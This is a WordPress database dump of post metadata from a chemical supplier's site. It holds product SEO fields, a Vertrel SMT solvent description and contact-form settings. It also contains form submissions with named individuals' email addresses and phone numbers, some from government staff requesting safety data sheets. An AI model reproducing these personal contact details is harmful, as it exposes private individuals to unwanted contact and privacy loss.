INSERT INTO `wp_postmeta` VALUES (21108, 954, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21109, 954, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21110, 954, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (21111, 954, '_yoast_wpseo_focuskw_text_input', 'Krytox VPF 1525'); 
INSERT INTO `wp_postmeta` VALUES (21112, 954, '_yoast_wpseo_focuskw', 'Krytox VPF 1525'); 
INSERT INTO `wp_postmeta` VALUES (21113, 954, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (21114, 954, '_yoast_wpseo_focuskeywords', '[{"keyword":"Krytox VPF 1525","score":"good"}]'); 
INSERT INTO `wp_postmeta` VALUES (21115, 888, '_wp_old_slug', 'nrt-plss'); 
INSERT INTO `wp_postmeta` VALUES (21116, 888, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21117, 888, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21118, 888, '_yoast_wpseo_linkdex', '30'); 
INSERT INTO `wp_postmeta` VALUES (21119, 2223, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (21120, 2223, '_seq_num', '21'); 
INSERT INTO `wp_postmeta` VALUES (21121, 2223, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (21122, 2223, '_field_1', 'AnneMarie Mulkerin'); 
INSERT INTO `wp_postmeta` VALUES (21123, 2223, '_field_10', 'TorqMaster, International'); 
INSERT INTO `wp_postmeta` VALUES (21124, 2223, '_field_2', 'amulkerin@torqmaster.com'); 
INSERT INTO `wp_postmeta` VALUES (21125, 2223, '_field_8', '(203) 326-5945'); 
INSERT INTO `wp_postmeta` VALUES (21126, 2223, '_field_3', 'Do you carry Food Grade Grease?'); 
INSERT INTO `wp_postmeta` VALUES (21127, 2223, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (21128, 2223, '_sub_id', '2223'); 
INSERT INTO `wp_postmeta` VALUES (21129, 1338, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21130, 1338, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21131, 1338, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (21132, 1338, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (21133, 1338, '_yoast_wpseo_focuskeywords', '[{"keyword":"MS-260","score":"good"}]'); 
INSERT INTO `wp_postmeta` VALUES (21134, 2224, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (21135, 2224, '_seq_num', '12'); 
INSERT INTO `wp_postmeta` VALUES (21136, 2224, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (21137, 2224, '_field_12', 'Brian Guffy'); 
INSERT INTO `wp_postmeta` VALUES (21138, 2224, '_field_13', 'ARMY'); 
INSERT INTO `wp_postmeta` VALUES (21139, 2224, '_field_18', '27'); 
INSERT INTO `wp_postmeta` VALUES (21140, 2224, '_field_14', 'brian.m.guffy.mil@mail.mil'); 
INSERT INTO `wp_postmeta` VALUES (21141, 2224, '_field_15', '(912) 767-1757'); 
INSERT INTO `wp_postmeta` VALUES (21142, 2224, '_field_16', 'I am needing a current SDS for the product MS-242N Quik Freeze. It must be current and in the SDS format to pass inspection. '); 
INSERT INTO `wp_postmeta` VALUES (21143, 2224, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (21144, 2224, '_sub_id', '2224'); 
INSERT INTO `wp_postmeta` VALUES (21145, 2225, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (21146, 2225, '_seq_num', '22'); 
INSERT INTO `wp_postmeta` VALUES (21147, 2225, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (21148, 2225, '_field_1', 'Kayla Mills'); 
INSERT INTO `wp_postmeta` VALUES (21149, 2225, '_field_10', 'Blue Grace Logistics'); 
INSERT INTO `wp_postmeta` VALUES (21150, 2225, '_field_2', 'KMills@Bluegracegroup.com'); 
INSERT INTO `wp_postmeta` VALUES (21151, 2225, '_field_8', '(253) 359-5519'); 
INSERT INTO `wp_postmeta` VALUES (21152, 2225, '_field_3', 'Good Morning!\r\n\r\nMy name is Kayla and I am with Blue Grace/Interlink. I was interested in reaching out to you to see if there are any shipments we can assist you with. At Blue Grace, we can meet almost any shipping need, and offer very, very low, competitive rates.\r\nIf you would be interested in comparing our pricing to the pricing you are already given, I would love to offer you some rates.\r\nWe ship for a lot of companies and a wide variety of products. From popcorn, to potato chips, to milk, ice cream, to displays, packaging, plastic articles, art, chemicals, supplements, hazmat, to medical equipment and supplies, to furniture- You name it, we can ship it!\r\n\r\nWe have several deals with carriers and can almost always beat whatever rate you are already receiving. \r\n\r\nIf you want to compare ours to rates on past shipments you have done with other carriers all I would need is:\r\n\r\nWeight/ dims/commodity\r\n#of pallets or pieces\r\n\r\nShip zip/ destination zip.\r\n\r\nI can have you rates back extremely fast and see if we can bring you on board!\r\n\r\nThank you so much for the opportunity and I look forward to working with you!!\r\n\r\nSincerely, \r\nKayla Mills\r\n'); 
INSERT INTO `wp_postmeta` VALUES (21153, 2225, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (21154, 2225, '_sub_id', '2225'); 
INSERT INTO `wp_postmeta` VALUES (21155, 2226, '_edit_lock', '1476378152:2'); 
INSERT INTO `wp_postmeta` VALUES (21156, 2226, '_edit_last', '2'); 
INSERT INTO `wp_postmeta` VALUES (21157, 2227, '_wp_attached_file', '2016/10/Vertrel-SMT.jpg'); 
INSERT INTO `wp_postmeta` VALUES (21158, 2227, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:5184;s:6:"height";i:3456;s:4:"file";s:23:"2016/10/Vertrel-SMT.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:23:"Vertrel-SMT-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:23:"Vertrel-SMT-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:23:"Vertrel-SMT-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:25:"Vertrel-SMT-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:23:"Vertrel-SMT-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:23:"Vertrel-SMT-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:23:"Vertrel-SMT-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:23:"Vertrel-SMT-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (21159, 2226, '_visibility', 'visible'); 
INSERT INTO `wp_postmeta` VALUES (21160, 2226, '_stock_status', 'instock'); 
INSERT INTO `wp_postmeta` VALUES (21161, 2226, '_thumbnail_id', '2227'); 
INSERT INTO `wp_postmeta` VALUES (21162, 2226, '312_default_editor', '<table width="456">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="2" width="456"><strong>Physical Properties of Vertrel SMT</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Molecular Weight</td>\r\n<td style="text-align: center;">128</td>\r\n</tr>\r\n<tr>\r\n<td>Boiling Point °C</td>\r\n<td style="text-align: center;">37</td>\r\n</tr>\r\n<tr>\r\n<td>Liquid Density, kg/l</td>\r\n<td style="text-align: center;">1.37</td>\r\n</tr>\r\n<tr>\r\n<td>Vapor Pressure</td>\r\n<td style="text-align: center;">0.639</td>\r\n</tr>\r\n<tr>\r\n<td>Surface Tension</td>\r\n<td style="text-align: center;">0.0155</td>\r\n</tr>\r\n<tr>\r\n<td>Freezing Point °C</td>\r\n<td style="text-align: center;">-50</td>\r\n</tr>\r\n<tr>\r\n<td>Solubility of Water, wt%</td>\r\n<td style="text-align: center;">0.34</td>\r\n</tr>\r\n<tr>\r\n<td>Viscosity, cPs</td>\r\n<td style="text-align: center;">0.47</td>\r\n</tr>\r\n</tbody>\r\n</table>'); 
INSERT INTO `wp_postmeta` VALUES (21163, 2226, '716_default_editor', '<ul>\r\n 	<li>Defluxing</li>\r\n 	<li>Precision Metal Cleaning</li>\r\n 	<li>Rosin</li>\r\n 	<li>Oils</li>\r\n 	<li>Ionic Contaminants</li>\r\n</ul>'); 
INSERT INTO `wp_postmeta` VALUES (21164, 2226, '1367_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21165, 2226, '719_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21166, 2226, '317_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21167, 2226, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21168, 2226, 'wc_productdata_options', 'a:1:{i:0;a:6:{s:11:"_bubble_new";s:0:"";s:12:"_bubble_text";s:0:"";s:17:"_custom_tab_title";s:0:"";s:11:"_custom_tab";s:0:"";s:14:"_product_video";s:0:"";s:19:"_product_video_size";s:0:"";}}'); 
INSERT INTO `wp_postmeta` VALUES (21169, 2226, '_enable_pep', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (21170, 2226, '_enable_price', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (21171, 2226, '_enable_add_to_cart', 'yes'); 
INSERT INTO `wp_postmeta` VALUES (21172, 2226, 'total_sales', '0'); 
INSERT INTO `wp_postmeta` VALUES (21173, 2226, '_downloadable', 'no'); 
INSERT INTO `wp_postmeta` VALUES (21174, 2226, '_virtual', 'no'); 
INSERT INTO `wp_postmeta` VALUES (21175, 2226, '_purchase_note', ''); 
INSERT INTO `wp_postmeta` VALUES (21176, 2226, '_featured', 'no'); 
INSERT INTO `wp_postmeta` VALUES (21177, 2226, '_weight', ''); 
INSERT INTO `wp_postmeta` VALUES (21178, 2226, '_length', ''); 
INSERT INTO `wp_postmeta` VALUES (21179, 2226, '_width', ''); 
INSERT INTO `wp_postmeta` VALUES (21180, 2226, '_height', ''); 
INSERT INTO `wp_postmeta` VALUES (21181, 2226, '_sku', ''); 
INSERT INTO `wp_postmeta` VALUES (21182, 2226, '_product_attributes', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (21183, 2226, '_regular_price', ''); 
INSERT INTO `wp_postmeta` VALUES (21184, 2226, '_sale_price', ''); 
INSERT INTO `wp_postmeta` VALUES (21185, 2226, '_sale_price_dates_from', ''); 
INSERT INTO `wp_postmeta` VALUES (21186, 2226, '_sale_price_dates_to', ''); 
INSERT INTO `wp_postmeta` VALUES (21187, 2226, '_price', ''); 
INSERT INTO `wp_postmeta` VALUES (21188, 2226, '_sold_individually', ''); 
INSERT INTO `wp_postmeta` VALUES (21189, 2226, '_manage_stock', 'no'); 
INSERT INTO `wp_postmeta` VALUES (21190, 2226, '_backorders', 'no'); 
INSERT INTO `wp_postmeta` VALUES (21191, 2226, '_stock', ''); 
INSERT INTO `wp_postmeta` VALUES (21192, 2226, '_upsell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (21193, 2226, '_crosssell_ids', 'a:0:{}'); 
INSERT INTO `wp_postmeta` VALUES (21194, 2226, '_product_version', '2.6.4'); 
INSERT INTO `wp_postmeta` VALUES (21195, 2226, '_ywtm_hide_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (21196, 2226, '_ywtm_override_description', 'no'); 
INSERT INTO `wp_postmeta` VALUES (21197, 2226, '_ywtm_priority_tab_description', '1'); 
INSERT INTO `wp_postmeta` VALUES (21198, 2226, '_ywtm_title_tab_description', 'Description'); 
INSERT INTO `wp_postmeta` VALUES (21199, 2226, '_ywtm_content_tab_description', 'Vertrel SMT is a proprietary azeotrope of DuPont™ Vertrel® XF hydrofluorocarbon (2,3 dihydrodeca-fluoropentane) with trans-1,2-dichloroethylene and methanol. It is ideally suited for use in vapor degreasing equipment with solvency power for cleaning ionic soils and flux residues from electronic assemblies. It can also be used for precision and general industrial cleaning where this enhanced solvency is required.\r\n\r\nVertrel SMT has “zero” ozone-depletion potential, and low global warming potential. It can replace CFC-113, 1,1,1-trichloroethane (1,1,1-TCA), hydrochlorofluorocarbons (HCFCs), and perfluorocarbons (PFCs) in many applications. DuPont™ Vertrel® SMT is accepted by the U.S. Environmental Protection Agency under the Significant New Alternatives Policy (SNAP) program, as a substitute for ozone-depleting substances.\r\n\r\nMost plastics commonly used for components mounted on printed wiring board assemblies can be safely cleaned in Vertrel SMT. Acrylic, ABS, and poly-carbonate parts, particularly if under stress, may show slight cracking or crazing damage and should be tested. EPDM, butyl rubber, Buna-S, and neoprene are recommended for elastomeric parts. Elastomer swelling and shrinking will, in most cases, revert to within a few percent of original size after air drying. Swell, shrinkage, and extractables are strongly affected by the compounding agents, plasticizers, and curing used in the manufacture of plastics and elastomers. Therefore, prior in-use testing is particularly important.\r\n\r\nVertrel SMT was found compatible with aluminum, copper, and iron, with and without rosin flux present, after exposure for two weeks at 120°C (248°F) in sealed tubes. Large amounts of water may extract alcohol and affect cleaning performance. Therefore, to reduce alcohol loss, use desiccant dryers rather than water separators in the condensate return line.\r\n\r\nVertrel SMT exhibits no closed cup or open cup flash point and is not classified as a flammable liquid by NFPA or DOT. However, the product does exhibit vapor flammability limits in air. Users should clear equipment of all vapors and liquids before performing any maintenance operations that could result in an ignition source.\r\n\r\nContact with highly basic process materials, pH 10 or above, is not recommended.'); 
INSERT INTO `wp_postmeta` VALUES (21200, 2226, '_product_image_gallery', ''); 
INSERT INTO `wp_postmeta` VALUES (21201, 2226, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21202, 2226, '_yoast_wpseo_primary_product_cat', '232'); 
INSERT INTO `wp_postmeta` VALUES (21203, 2226, '_yoast_wpseo_focuskw_text_input', 'Vertrel SMT'); 
INSERT INTO `wp_postmeta` VALUES (21204, 2226, '_yoast_wpseo_focuskw', 'Vertrel SMT'); 
INSERT INTO `wp_postmeta` VALUES (21205, 2226, '_yoast_wpseo_title', 'Vertrel SMT Defluxing and Precision Metal Cleaning'); 
INSERT INTO `wp_postmeta` VALUES (21206, 2226, '_yoast_wpseo_metadesc', 'Vertrel SMT is a proprietary azeotrope of Vertrel XF hydrofluorocarbon (2,3 dihydrodeca- fluoropentane) with trans-1,2-dichloroethylene and methanol.'); 
INSERT INTO `wp_postmeta` VALUES (21207, 2226, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (21208, 2226, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (21209, 1292, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21210, 1292, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21211, 1292, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (21212, 1292, '_yoast_wpseo_content_score', '60'); 
INSERT INTO `wp_postmeta` VALUES (21213, 1292, '_yoast_wpseo_focuskeywords', '[]'); 
INSERT INTO `wp_postmeta` VALUES (21224, 2223, '_edit_lock', '1475581071:1'); 
INSERT INTO `wp_postmeta` VALUES (21225, 2225, '_edit_lock', '1475675796:2'); 
INSERT INTO `wp_postmeta` VALUES (21226, 2224, '_edit_lock', '1475676374:2'); 
INSERT INTO `wp_postmeta` VALUES (21227, 789, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21228, 789, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21229, 2231, '_wp_attached_file', '2016/08/shutterstock_106416161.jpg'); 
INSERT INTO `wp_postmeta` VALUES (21230, 2231, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:3850;s:6:"height";i:2567;s:4:"file";s:34:"2016/08/shutterstock_106416161.jpg";s:5:"sizes";a:8:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_106416161-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_106416161-800x533.jpg";s:5:"width";i:800;s:6:"height";i:533;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_106416161-768x512.jpg";s:5:"width";i:768;s:6:"height";i:512;s:9:"mime-type";s:10:"image/jpeg";}s:5:"large";a:4:{s:4:"file";s:36:"shutterstock_106416161-1600x1067.jpg";s:5:"width";i:1600;s:6:"height";i:1067;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_106416161-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_106416161-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_106416161-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_106416161-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"2";s:8:"quantity";d:78;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (21231, 2232, '_form', '<label> Your Name (required)\n    [text* your-name] </label>\n\n<label> Your Email (required)\n    [email* your-email] </label>\n\n<label> Subject\n    [text your-subject] </label>\n\n<label> Your Message\n    [textarea your-message] </label>\n\n[submit "Send"]'); 
INSERT INTO `wp_postmeta` VALUES (21232, 2232, '_mail', 'a:8:{s:7:"subject";s:44:"Miller-Stephenson Chemicals "[your-subject]"";s:6:"sender";s:38:"[your-name] <wordpress@104.238.94.202>";s:4:"body";s:198:"From: [your-name] <[your-email]>\nSubject: [your-subject]\n\nMessage Body:\n[your-message]\n\n--\nThis e-mail was sent from a contact form on Miller-Stephenson Chemicals (https://www.miller-stephenson.com)";s:9:"recipient";s:20:"ddillulio@mschem.com";s:18:"additional_headers";s:22:"Reply-To: [your-email]";s:11:"attachments";s:0:"";s:8:"use_html";i:0;s:13:"exclude_blank";i:0;}'); 
INSERT INTO `wp_postmeta` VALUES (21233, 2232, '_mail_2', 'a:9:{s:6:"active";b:0;s:7:"subject";s:44:"Miller-Stephenson Chemicals "[your-subject]"";s:6:"sender";s:54:"Miller-Stephenson Chemicals <wordpress@104.238.94.202>";s:4:"body";s:140:"Message Body:\n[your-message]\n\n--\nThis e-mail was sent from a contact form on Miller-Stephenson Chemicals (https://www.miller-stephenson.com)";s:9:"recipient";s:12:"[your-email]";s:18:"additional_headers";s:30:"Reply-To: ddillulio@mschem.com";s:11:"attachments";s:0:"";s:8:"use_html";i:0;s:13:"exclude_blank";i:0;}'); 
INSERT INTO `wp_postmeta` VALUES (21234, 2232, '_messages', 'a:8:{s:12:"mail_sent_ok";s:45:"Thank you for your message. It has been sent.";s:12:"mail_sent_ng";s:71:"There was an error trying to send your message. Please try again later.";s:16:"validation_error";s:61:"One or more fields have an error. Please check and try again.";s:4:"spam";s:71:"There was an error trying to send your message. Please try again later.";s:12:"accept_terms";s:69:"You must accept the terms and conditions before sending your message.";s:16:"invalid_required";s:22:"The field is required.";s:16:"invalid_too_long";s:22:"The field is too long.";s:17:"invalid_too_short";s:23:"The field is too short.";}'); 
INSERT INTO `wp_postmeta` VALUES (21235, 2232, '_additional_settings', ''); 
INSERT INTO `wp_postmeta` VALUES (21236, 2232, '_locale', 'en_US'); 
INSERT INTO `wp_postmeta` VALUES (21237, 310, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21238, 310, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21239, 310, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (21240, 310, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (21241, 310, '_yoast_wpseo_focuskeywords', '[{"keyword":"ReleaSys 8900","score":"good"}]'); 
INSERT INTO `wp_postmeta` VALUES (21252, 2234, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (21253, 2234, '_seq_num', '13'); 
INSERT INTO `wp_postmeta` VALUES (21254, 2234, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (21255, 2234, '_field_12', 'erwetert'); 
INSERT INTO `wp_postmeta` VALUES (21256, 2234, '_field_13', 'ertewrt'); 
INSERT INTO `wp_postmeta` VALUES (21257, 2234, '_field_18', '3453453'); 
INSERT INTO `wp_postmeta` VALUES (21258, 2234, '_field_14', 'testuser@testuser.com'); 
INSERT INTO `wp_postmeta` VALUES (21259, 2234, '_field_15', '(435) 545-6666'); 
INSERT INTO `wp_postmeta` VALUES (21260, 2234, '_field_16', 'test\n'); 
INSERT INTO `wp_postmeta` VALUES (21261, 2234, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (21262, 2234, '_sub_id', '2234'); 
INSERT INTO `wp_postmeta` VALUES (21273, 2236, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (21274, 2236, '_seq_num', '14'); 
INSERT INTO `wp_postmeta` VALUES (21275, 2236, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (21276, 2236, '_field_12', 'support test'); 
INSERT INTO `wp_postmeta` VALUES (21277, 2236, '_field_13', 'test '); 
INSERT INTO `wp_postmeta` VALUES (21278, 2236, '_field_18', '34234'); 
INSERT INTO `wp_postmeta` VALUES (21279, 2236, '_field_14', 'jjjj@jjjjj.com'); 
INSERT INTO `wp_postmeta` VALUES (21280, 2236, '_field_15', '(334) 342-3423'); 
INSERT INTO `wp_postmeta` VALUES (21281, 2236, '_field_16', 'sdfsdfsdf'); 
INSERT INTO `wp_postmeta` VALUES (21282, 2236, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (21283, 2236, '_sub_id', '2236'); 
INSERT INTO `wp_postmeta` VALUES (21284, 400, '_wp_old_slug', 'releasys-82'); 
INSERT INTO `wp_postmeta` VALUES (21285, 400, '2065_default_editor', ''); 
INSERT INTO `wp_postmeta` VALUES (21286, 400, '_show_author_inthis_post', 'author_default'); 
INSERT INTO `wp_postmeta` VALUES (21287, 400, '_yoast_wpseo_primary_product_cat', ''); 
INSERT INTO `wp_postmeta` VALUES (21288, 400, '_yoast_wpseo_focuskw_text_input', 'Water-based PTFE Release Agent'); 
INSERT INTO `wp_postmeta` VALUES (21289, 400, '_yoast_wpseo_focuskw', 'Water-based PTFE Release Agent'); 
INSERT INTO `wp_postmeta` VALUES (21290, 400, '_yoast_wpseo_content_score', '30'); 
INSERT INTO `wp_postmeta` VALUES (21291, 400, '_yoast_wpseo_focuskeywords', '[{"keyword":"ReleaSys 82","score":"good"}]'); 
INSERT INTO `wp_postmeta` VALUES (21292, 2238, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (21293, 2238, '_seq_num', '15'); 
INSERT INTO `wp_postmeta` VALUES (21294, 2238, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (21295, 2238, '_field_12', 'Tianna Hite'); 
INSERT INTO `wp_postmeta` VALUES (21296, 2238, '_field_13', 'VelocityEHS'); 
INSERT INTO `wp_postmeta` VALUES (21297, 2238, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (21298, 2238, '_field_14', 'thite@ehs.com'); 
INSERT INTO `wp_postmeta` VALUES (21299, 2238, '_field_15', '(708) 209-5372'); 
INSERT INTO `wp_postmeta` VALUES (21300, 2238, '_field_16', 'Hello,\r\n \r\nI am looking to obtain the latest Safety Data Sheet, which I was not able to locate on your website. I need the latest version or confirmation that this product has been discontinued. The products are:​​\r\n\r\nMS-242N-AS ANTI-STATIC QUIK-FREEZE (MS-242N-AS)	\r\n{French 7 English Version}\r\n\r\n'); 
INSERT INTO `wp_postmeta` VALUES (21301, 2238, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (21302, 2238, '_sub_id', '2238'); 
INSERT INTO `wp_postmeta` VALUES (21303, 2239, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (21304, 2239, '_seq_num', '16'); 
INSERT INTO `wp_postmeta` VALUES (21305, 2239, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (21306, 2239, '_field_12', 'Tianna Hite'); 
INSERT INTO `wp_postmeta` VALUES (21307, 2239, '_field_13', 'VelocityEHS'); 
INSERT INTO `wp_postmeta` VALUES (21308, 2239, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (21309, 2239, '_field_14', 'thite@ehs.com'); 
INSERT INTO `wp_postmeta` VALUES (21310, 2239, '_field_15', '(708) 209-5372'); 
INSERT INTO `wp_postmeta` VALUES (21311, 2239, '_field_16', 'Hello,\r\n \r\nI am looking to obtain the latest Safety Data Sheet, which I was not able to locate on your website. I need the latest version or confirmation that this product has been discontinued. The products are:\r\n\r\nMS-755; MS-755M; VERTREL SMT; HEAVY DUTY SOLVENT &amp; FLUX REMOVER; DPMS T0108A	\r\n\r\nMS-765; MS-765M; CLEANING AGENT; DPMS T0417A2\r\n	\r\nMS-795, MS-795M, VERTREL XMS PLUS, HEAVY DUTY SOLVENT &amp; FLUX REMOVER, DPMS V0201A 	\r\n'); 
INSERT INTO `wp_postmeta` VALUES (21312, 2239, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (21313, 2239, '_sub_id', '2239'); 
INSERT INTO `wp_postmeta` VALUES (21314, 2240, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (21315, 2240, '_seq_num', '17'); 
INSERT INTO `wp_postmeta` VALUES (21316, 2240, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (21317, 2240, '_field_12', 'Randy Williams'); 
INSERT INTO `wp_postmeta` VALUES (21318, 2240, '_field_13', 'LSI Solutions'); 
INSERT INTO `wp_postmeta` VALUES (21319, 2240, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (21320, 2240, '_field_14', 'rdwilliams1977@gmail.com'); 
INSERT INTO `wp_postmeta` VALUES (21321, 2240, '_field_15', '(585) 919-9912'); 
INSERT INTO `wp_postmeta` VALUES (21322, 2240, '_field_16', 'I need MSDS Sheets for the following products\r\nTDS-122AD\r\n122AV\r\n122SE'); 
INSERT INTO `wp_postmeta` VALUES (21323, 2240, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (21324, 2240, '_sub_id', '2240'); 
INSERT INTO `wp_postmeta` VALUES (21334, 2241, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (21335, 2241, '_seq_num', '18'); 
INSERT INTO `wp_postmeta` VALUES (21336, 2241, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (21337, 2241, '_field_12', 'Mark Fletcher'); 
INSERT INTO `wp_postmeta` VALUES (21338, 2241, '_field_13', 'FAA'); 
INSERT INTO `wp_postmeta` VALUES (21339, 2241, '_field_18', '#32'); 
INSERT INTO `wp_postmeta` VALUES (21340, 2241, '_field_14', 'mark.t.fletcher@faa.gov'); 
INSERT INTO `wp_postmeta` VALUES (21341, 2241, '_field_15', '(405) 954-8057'); 
INSERT INTO `wp_postmeta` VALUES (21342, 2241, '_field_16', 'I am needing current SDS information for the Aero duster, part # MS-222N, please.'); 
INSERT INTO `wp_postmeta` VALUES (21343, 2241, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (21344, 2241, '_sub_id', '2241'); 
INSERT INTO `wp_postmeta` VALUES (21345, 2240, '_edit_lock', '1475677031:2'); 
INSERT INTO `wp_postmeta` VALUES (21346, 2241, '_edit_lock', '1475676354:2'); 
INSERT INTO `wp_postmeta` VALUES (21347, 2242, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (21348, 2242, '_seq_num', '26'); 
INSERT INTO `wp_postmeta` VALUES (21349, 2242, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (21350, 2242, '_field_1', 'suresh'); 
